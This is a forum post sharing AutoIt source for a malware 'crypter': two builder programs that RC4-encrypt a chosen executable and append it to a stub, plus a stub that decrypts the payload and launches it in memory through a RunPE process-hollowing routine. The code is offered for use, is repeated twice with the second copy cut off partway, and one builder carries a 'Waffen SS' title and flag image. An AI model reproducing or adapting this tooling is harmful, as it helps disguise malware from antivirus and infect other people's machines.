13 Years of Service
95%
Cliente:
[lenguaje=autoit] ;Créditos: A.D.I Fênix
;http://www.orkut.com.br/Main#Community?cmm=25309445'>http://www.orkut.com.br/Main#Community?cmm=25309445'>http://www.orkut.com.br/Main#Community?cmm=25309445
;
#include
#include
#include
#include
#include
#Region ### START Koda GUI section ### Form=c:\documents and settings\eu\meus documentos\form1.kxf
$Form1_1 = GUICreate("Waffen SS crypter by Rudeb0y777 ", 709, 381, 209, 113)
$Button1 = GUICtrlCreateButton("Abrir", 104, 160, 139, 65)
GUICtrlSetFont(-1, 12, 800, 0, "Algerian")
GUICtrlSetColor(-1, 0x0000FF)
GUICtrlSetBkColor(-1, 0xD4D0C8)
$Button2 = GUICtrlCreateButton("Encriptar", 368, 160, 147, 65)
GUICtrlSetFont(-1, 12, 800, 0, "Algerian")
GUICtrlSetColor(-1, 0x0000FF)
GUICtrlSetBkColor(-1, 0xD4D0C8)
$Input1 = GUICtrlCreateInput("Arquivo...", 120, 112, 401, 21)
$Pic1 = GUICtrlCreatePic("C:\Documents and Settings\Eu\Meus documentos\Meus documentos\Downloads\fotos variadas\waffen-ss-flag2.JPG", 0, 0, 705, 377, BitOR($SS_NOTIFY,$WS_GROUP,$WS_CLIPSIBLINGS))
SoundPlay(@WindowsDir & "nova pasta\teste.mp3", 1)
SoundSetWaveVolume(100)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
Case $Form1_1
Case $Button1
GUICtrlSetData($Input1, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)"))
Case $Button2
if GuiCtrlRead($Input1) = "" then return
$stub = FileOpen(@ScriptDir & "\stub.exe" , 16)
$arquivo2 = FileOpen(GuiCtrlRead($Input1), 16)
$st = FileRead($stub)
$ar = FileRead($arquivo2)
$ar = _RC4($ar,"LOLxD")
Func _RC4($DATA, $KEY)
Local $OPCODE = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]")
DllStructSetData($CODEBUFFER, 1, $OPCODE)
Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]")
DllStructSetData($BUFFER, 1, $DATA)
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $KEY, "int", 0)
Local $RET = DllStructGetData($BUFFER, 1)
$BUFFER = 0
$CODEBUFFER = 0
Return $RET
EndFunc
$salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18)
FileWrite($salvar, $st)
FileWrite($salvar, StringToBinary("rud777"))
FileWrite($salvar, $ar)
FileClose($stub)
FileClose($Input1)
FileClose($Salvar)
MsgBox(64, "Encriptado!!!", "By Rud3b0y777")
EndSwitch
WEnd
[/lenguaje]
Otro Cliente:
[lenguaje=autoit] ;Créditos: A.D.I Fênix
;http://www.orkut.com.br/Main#Community?cmm=25309445
;
#Include
#Include
#Include
#Include
#Include
#Include
#Region ### START Koda GUI section ### Form=
Opt("GuiOnEventMode",1)
$a = GUICreate(" Crypter ! Autoit*-*", 378, 406, 192, 124)
GUISetIcon("C:\Documents and Settings\Gilmar\Desktop\projeto novo\icone.ico")
GUISetBkColor(0x000000)
$Pic1 = GUICtrlCreatePic("C:\Documents and Settings\Gilmar\Desktop\Autoit\foto.jpg", 0, 0, 377, 345)
$Abrir = GUICtrlCreateButton("Abrir", 208, 376, 73, 25, $WS_GROUP)
$Cryptar = GUICtrlCreateButton("Cryptar", 296, 376, 73, 25, $WS_GROUP)
$Arquivo = GUICtrlCreateInput("Arquivo", 0, 352, 377, 21)
GUISetOnEvent($Gui_Event_Close, "sr")
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###
GUICtrlSetOnEvent($Abrir, "abrir")
GUICtrlSetOnEvent($Cryptar, "Cs")
Func abrir()
GUICtrlSetData($Arquivo, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)"))
EndFunc
Func Cs()
if GuiCtrlRead($Arquivo) = "" then return
$stub = FileOpen(@ScriptDir & "\Stub.exe" , 16)
$arquivo2 = FileOpen(GuiCtrlRead($Arquivo), 16)
$st = FileRead($stub)
$ar = FileRead($arquivo2)
$ar = _RC4($ar, "Key")
$salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18)
FileWrite($salvar, $st)
FileWrite($salvar, StringToBinary("Separador"))
FileWrite($salvar, $ar)
FileClose($stub)
FileClose($Arquivo)
FileClose($Salvar)
MsgBox(64, " Crypter !", "Encryptado com sucesso !")
EndFunc
Func sr()
Exit
EndFunc
While 1
Sleep(1)
WEnd
[/lenguaje]
Stub:
[lenguaje=autoit] ;Créditos: A.D.I Fênix
;http://www.orkut.com.br/Main#Community?cmm=25309445
;
#NoTrayIcon
;
$FileStub = Sleep(150)
$file = FileOpen(@ScriptFullPath, 0)
$Data = FileRead($file)
$Data = StringMid($Data, StringInstr($Data, "separador") + StringLen ("separador"))
$Data = _RC4($Data, "key")
_RunPE($Data)
Func _RC4($DATA, $KEY)
Local $OPCODE = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]")
DllStructSetData($CODEBUFFER, 1, $OPCODE)
Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]")
DllStructSetData($BUFFER, 1, $DATA)
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $KEY, "int", 0)
Local $RET = DllStructGetData($BUFFER, 1)
$BUFFER = 0
$CODEBUFFER = 0
Return $RET
EndFunc
Func _RunPE($BBINARYIMAGE)
#region 1. PREPROCESSING PASSED
Local $BBINARY = Binary($BBINARYIMAGE)
Local $TBINARY = DllStructCreate("byte[" & BinaryLen($BBINARY) & "]")
DllStructSetData($TBINARY, 1, $BBINARY)
Local $PPOINTER = DllStructGetPtr($TBINARY)
#region 2. CREATING NEW PROCESS
Local $TSTARTUPINFO = DllStructCreate("dword cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "ushort ShowWindow;" & "ushort Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError")
Local $TPROCESS_INFORMATION = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId")
Local $ACALL = DllCall("kernel32.dll", "int", "CreateProcessW", "wstr", @AutoItExe, "ptr", 0, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($TSTARTUPINFO), "ptr", DllStructGetPtr($TPROCESS_INFORMATION))
If @error Or Not $ACALL[0] Then
Return SetError(1, 0, 0)
EndIf
Local $HPROCESS = DllStructGetData($TPROCESS_INFORMATION, "Process")
Local $HTHREAD = DllStructGetData($TPROCESS_INFORMATION, "Thread")
#region 3. FILL CONTEXT STRUCTURE
Local $TCONTEXT = DllStructCreate("dword ContextFlags;" & "dword Dr0;" & "dword Dr1;" & "dword Dr2;" & "dword Dr3;" & "dword Dr6;" & "dword Dr7;" & "dword ControlWord;" & "dword StatusWord;" & "dword TagWord;" & "dword ErrorOffset;" & "dword ErrorSelector;" & "dword DataOffset;" & "dword DataSelector;" & "byte RegisterArea[80];" & "dword Cr0NpxState;" & "dword SegGs;" & "dword SegFs;" & "dword SegEs;" & "dword SegDs;" & "dword Edi;" & "dword Esi;" & "dword Ebx;" & "dword Edx;" & "dword Ecx;" & "dword Eax;" & "dword Ebp;" & "dword Eip;" & "dword SegCs;" & "dword EFlags;" & "dword Esp;" & "dword SegS")
DllStructSetData($TCONTEXT, "ContextFlags", 65538)
$ACALL = DllCall("kernel32.dll", "int", "GetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT))
If @error Or Not $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(2, 0, 0)
EndIf
#region 4. READ PE-FORMAT
Local $TIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & "ushort BytesOnLastPage;" & "ushort Pages;" & "ushort Relocations;" & "ushort SizeofHeader;" & "ushort MinimumExtra;" & "ushort MaximumExtra;" & "ushort SS;" & "ushort SP;" & "ushort Checksum;" & "ushort IP;" & "ushort CS;" & "ushort Relocation;" & "ushort Overlay;" & "char Reserved[8];" & "ushort OEMIdentifier;" & "ushort OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $PPOINTER)
$PPOINTER += DllStructGetData($TIMAGE_DOS_HEADER, "AddressOfNewExeHeader")
Local $SMAGIC = DllStructGetData($TIMAGE_DOS_HEADER, "Magic")
If Not ($SMAGIC == "MZ") Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(3, 0, 0)
EndIf
Local $TIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $PPOINTER)
$PPOINTER += 4
If DllStructGetData($TIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(4, 0, 0)
EndIf
Local $TIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;" & "ushort NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "ushort SizeOfOptionalHeader;" & "ushort Characteristics", $PPOINTER)
Local $INUMBEROFSECTIONS = DllStructGetData($TIMAGE_FILE_HEADER, "NumberOfSections")
$PPOINTER += 20
Local $TIMAGE_OPTIONAL_HEADER = DllStructCreate("ushort Magic;" & "ubyte MajorLinkerVersion;" & "ubyte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "ushort MajorOperatingSystemVersion;" & "ushort MinorOperatingSystemVersion;" & "ushort MajorImageVersion;" & "ushort MinorImageVersion;" & "ushort MajorSubsystemVersion;" & "ushort MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "ushort Subsystem;" & "ushort DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $PPOINTER)
$PPOINTER += 96
Local $IMAGIC = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "Magic")
If $IMAGIC <> 267 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(5, 0, 0)
EndIf
Local $IENTRYPOINTNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint")
$PPOINTER += 128
Local $POPTIONALHEADERIMAGEBASENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "ImageBase")
Local $IOPTIONALHEADERSIZEOFIMAGENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfImage")
#region 5. CLEAR EVERYTHING THAT THIS NEW PROCESS HAVE MAPPED
$ACALL = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW)
If @error Or $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(6, 0, 0)
EndIf
#region 6. ALLOCATE 'NEW' MEMORY SPACE
$ACALL = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW, "dword", $IOPTIONALHEADERSIZEOFIMAGENEW, "dword", 12288, "dword", 64)
If @error Or Not $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(7, 0, 0)
EndIf
Local $PREMOTECODE = $ACALL[0]
#region 7. GET AND WRITE NEW PE-HEADERS
Local $PHEADERS_NEW = DllStructGetPtr($TIMAGE_DOS_HEADER)
Local $IOPTIONALHEADERSIZEOFHEADERSNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfHeaders")
$ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE, "ptr", $PHEADERS_NEW, "dword", $IOPTIONALHEADERSIZEOFHEADERSNEW, "dword*", 0)
If @error Or Not $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(8, 0, 0)
EndIf
#region 8. WRITE SECTIONS
Local $TIMAGE_SECTION_HEADER
Local $ISIZEOFRAWDATA, $PPOINTERTORAWDATA
Local $IVIRTUALADDRESS
For $I = 1 To $INUMBEROFSECTIONS
$TIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "ushort NumberOfRelocations;" & "ushort NumberOfLinenumbers;" & "dword Characteristics", $PPOINTER)
$ISIZEOFRAWDATA = DllStructGetData($TIMAGE_SECTION_HEADER, "SizeOfRawData")
$PPOINTERTORAWDATA = DllStructGetPtr($TIMAGE_DOS_HEADER) + DllStructGetData($TIMAGE_SECTION_HEADER, "PointerToRawData")
$IVIRTUALADDRESS = DllStructGetData($TIMAGE_SECTION_HEADER, "VirtualAddress")
If $ISIZEOFRAWDATA Then
$ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE + $IVIRTUALADDRESS, "ptr", $PPOINTERTORAWDATA, "dword", $ISIZEOFRAWDATA, "dword*", 0)
If @error Or Not $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(9, $I, 0)
EndIf
EndIf
$PPOINTER += 40
Next
#region 9. NEW ENTRY POINT
DllStructSetData($TCONTEXT, "Eax", $PREMOTECODE + $IENTRYPOINTNEW)
#region 10. SET NEW CONTEXT
$ACALL = DllCall("kernel32.dll", "int", "SetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT))
If @error Or Not $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(10, 0, 0)
EndIf
#region 11. RESUME THREAD
$ACALL = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $HTHREAD)
If @error Or $ACALL[0] = -1 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(11, 0, 0)
EndIf
#region 12. RETURN SUCCESS
Return DllStructGetData($TPROCESS_INFORMATION, "ProcessId")
EndFunc
;Créditos: A.D.I Fênix
[/lenguaje]
Fuente: C-51
Saludos
[lenguaje=autoit] ;Créditos: A.D.I Fênix
;http://www.orkut.com.br/Main#Community?cmm=25309445'>http://www.orkut.com.br/Main#Community?cmm=25309445'>http://www.orkut.com.br/Main#Community?cmm=25309445
;
#include
#include
#include
#include
#include
#Region ### START Koda GUI section ### Form=c:\documents and settings\eu\meus documentos\form1.kxf
$Form1_1 = GUICreate("Waffen SS crypter by Rudeb0y777 ", 709, 381, 209, 113)
$Button1 = GUICtrlCreateButton("Abrir", 104, 160, 139, 65)
GUICtrlSetFont(-1, 12, 800, 0, "Algerian")
GUICtrlSetColor(-1, 0x0000FF)
GUICtrlSetBkColor(-1, 0xD4D0C8)
$Button2 = GUICtrlCreateButton("Encriptar", 368, 160, 147, 65)
GUICtrlSetFont(-1, 12, 800, 0, "Algerian")
GUICtrlSetColor(-1, 0x0000FF)
GUICtrlSetBkColor(-1, 0xD4D0C8)
$Input1 = GUICtrlCreateInput("Arquivo...", 120, 112, 401, 21)
$Pic1 = GUICtrlCreatePic("C:\Documents and Settings\Eu\Meus documentos\Meus documentos\Downloads\fotos variadas\waffen-ss-flag2.JPG", 0, 0, 705, 377, BitOR($SS_NOTIFY,$WS_GROUP,$WS_CLIPSIBLINGS))
SoundPlay(@WindowsDir & "nova pasta\teste.mp3", 1)
SoundSetWaveVolume(100)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
Case $Form1_1
Case $Button1
GUICtrlSetData($Input1, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)"))
Case $Button2
if GuiCtrlRead($Input1) = "" then return
$stub = FileOpen(@ScriptDir & "\stub.exe" , 16)
$arquivo2 = FileOpen(GuiCtrlRead($Input1), 16)
$st = FileRead($stub)
$ar = FileRead($arquivo2)
$ar = _RC4($ar,"LOLxD")
Func _RC4($DATA, $KEY)
Local $OPCODE = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]")
DllStructSetData($CODEBUFFER, 1, $OPCODE)
Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]")
DllStructSetData($BUFFER, 1, $DATA)
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $KEY, "int", 0)
Local $RET = DllStructGetData($BUFFER, 1)
$BUFFER = 0
$CODEBUFFER = 0
Return $RET
EndFunc
$salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18)
FileWrite($salvar, $st)
FileWrite($salvar, StringToBinary("rud777"))
FileWrite($salvar, $ar)
FileClose($stub)
FileClose($Input1)
FileClose($Salvar)
MsgBox(64, "Encriptado!!!", "By Rud3b0y777")
EndSwitch
WEnd
[/lenguaje]
Otro Cliente:
[lenguaje=autoit] ;Créditos: A.D.I Fênix
;http://www.orkut.com.br/Main#Community?cmm=25309445
;
#Include
#Include
#Include
#Include
#Include
#Include
#Region ### START Koda GUI section ### Form=
Opt("GuiOnEventMode",1)
$a = GUICreate(" Crypter ! Autoit*-*", 378, 406, 192, 124)
GUISetIcon("C:\Documents and Settings\Gilmar\Desktop\projeto novo\icone.ico")
GUISetBkColor(0x000000)
$Pic1 = GUICtrlCreatePic("C:\Documents and Settings\Gilmar\Desktop\Autoit\foto.jpg", 0, 0, 377, 345)
$Abrir = GUICtrlCreateButton("Abrir", 208, 376, 73, 25, $WS_GROUP)
$Cryptar = GUICtrlCreateButton("Cryptar", 296, 376, 73, 25, $WS_GROUP)
$Arquivo = GUICtrlCreateInput("Arquivo", 0, 352, 377, 21)
GUISetOnEvent($Gui_Event_Close, "sr")
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###
GUICtrlSetOnEvent($Abrir, "abrir")
GUICtrlSetOnEvent($Cryptar, "Cs")
Func abrir()
GUICtrlSetData($Arquivo, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)"))
EndFunc
Func Cs()
if GuiCtrlRead($Arquivo) = "" then return
$stub = FileOpen(@ScriptDir & "\Stub.exe" , 16)
$arquivo2 = FileOpen(GuiCtrlRead($Arquivo), 16)
$st = FileRead($stub)
$ar = FileRead($arquivo2)
$ar = _RC4($ar, "Key")
$salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18)
FileWrite($salvar, $st)
FileWrite($salvar, StringToBinary("Separador"))
FileWrite($salvar, $ar)
FileClose($stub)
FileClose($Arquivo)
FileClose($Salvar)
MsgBox(64, " Crypter !", "Encryptado com sucesso !")
EndFunc
Func sr()
Exit
EndFunc
While 1
Sleep(1)
WEnd
[/lenguaje]
Stub:
[lenguaje=autoit] ;Créditos: A.D.I Fênix
;http://www.orkut.com.br/Main#Community?cmm=25309445
;
#NoTrayIcon
;
$FileStub = Sleep(150)
$file = FileOpen(@ScriptFullPath, 0)
$Data = FileRead($file)
$Data = StringMid($Data, StringInstr($Data, "separador") + StringLen ("separador"))
$Data = _RC4($Data, "key")
_RunPE($Data)
Func _RC4($DATA, $KEY)
Local $OPCODE = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]")
DllStructSetData($CODEBUFFER, 1, $OPCODE)
Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]")
DllStructSetData($BUFFER, 1, $DATA)
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $KEY, "int", 0)
Local $RET = DllStructGetData($BUFFER, 1)
$BUFFER = 0
$CODEBUFFER = 0
Return $RET
EndFunc
Func _RunPE($BBINARYIMAGE)
#region 1. PREPROCESSING PASSED
Local $BBINARY = Binary($BBINARYIMAGE)
Local $TBINARY = DllStructCreate("byte[" & BinaryLen($BBINARY) & "]")
DllStructSetData($TBINARY, 1, $BBINARY)
Local $PPOINTER = DllStructGetPtr($TBINARY)
#region 2. CREATING NEW PROCESS
Local $TSTARTUPINFO = DllStructCreate("dword cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "ushort ShowWindow;" & "ushort Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError")
Local $TPROCESS_INFORMATION = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId")
Local $ACALL = DllCall("kernel32.dll", "int", "CreateProcessW", "wstr", @AutoItExe, "ptr", 0, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($TSTARTUPINFO), "ptr", DllStructGetPtr($TPROCESS_INFORMATION))
If @error Or Not $ACALL[0] Then
Return SetError(1, 0, 0)
EndIf
Local $HPROCESS = DllStructGetData($TPROCESS_INFORMATION, "Process")
Local $HTHREAD = DllStructGetData($TPROCESS_INFORMATION, "Thread")
#region 3. FILL CONTEXT STRUCTURE
Local $TCONTEXT = DllStructCreate("dword ContextFlags;" & "dword Dr0;" & "dword Dr1;" & "dword Dr2;" & "dword Dr3;" & "dword Dr6;" & "dword Dr7;" & "dword ControlWord;" & "dword StatusWord;" & "dword TagWord;" & "dword ErrorOffset;" & "dword ErrorSelector;" & "dword DataOffset;" & "dword DataSelector;" & "byte RegisterArea[80];" & "dword Cr0NpxState;" & "dword SegGs;" & "dword SegFs;" & "dword SegEs;" & "dword SegDs;" & "dword Edi;" & "dword Esi;" & "dword Ebx;" & "dword Edx;" & "dword Ecx;" & "dword Eax;" & "dword Ebp;" & "dword Eip;" & "dword SegCs;" & "dword EFlags;" & "dword Esp;" & "dword SegS")
DllStructSetData($TCONTEXT, "ContextFlags", 65538)
$ACALL = DllCall("kernel32.dll", "int", "GetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT))
If @error Or Not $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(2, 0, 0)
EndIf
#region 4. READ PE-FORMAT
Local $TIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & "ushort BytesOnLastPage;" & "ushort Pages;" & "ushort Relocations;" & "ushort SizeofHeader;" & "ushort MinimumExtra;" & "ushort MaximumExtra;" & "ushort SS;" & "ushort SP;" & "ushort Checksum;" & "ushort IP;" & "ushort CS;" & "ushort Relocation;" & "ushort Overlay;" & "char Reserved[8];" & "ushort OEMIdentifier;" & "ushort OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $PPOINTER)
$PPOINTER += DllStructGetData($TIMAGE_DOS_HEADER, "AddressOfNewExeHeader")
Local $SMAGIC = DllStructGetData($TIMAGE_DOS_HEADER, "Magic")
If Not ($SMAGIC == "MZ") Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(3, 0, 0)
EndIf
Local $TIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $PPOINTER)
$PPOINTER += 4
If DllStructGetData($TIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(4, 0, 0)
EndIf
Local $TIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;" & "ushort NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "ushort SizeOfOptionalHeader;" & "ushort Characteristics", $PPOINTER)
Local $INUMBEROFSECTIONS = DllStructGetData($TIMAGE_FILE_HEADER, "NumberOfSections")
$PPOINTER += 20
Local $TIMAGE_OPTIONAL_HEADER = DllStructCreate("ushort Magic;" & "ubyte MajorLinkerVersion;" & "ubyte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "ushort MajorOperatingSystemVersion;" & "ushort MinorOperatingSystemVersion;" & "ushort MajorImageVersion;" & "ushort MinorImageVersion;" & "ushort MajorSubsystemVersion;" & "ushort MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "ushort Subsystem;" & "ushort DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $PPOINTER)
$PPOINTER += 96
Local $IMAGIC = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "Magic")
If $IMAGIC <> 267 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(5, 0, 0)
EndIf
Local $IENTRYPOINTNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint")
$PPOINTER += 128
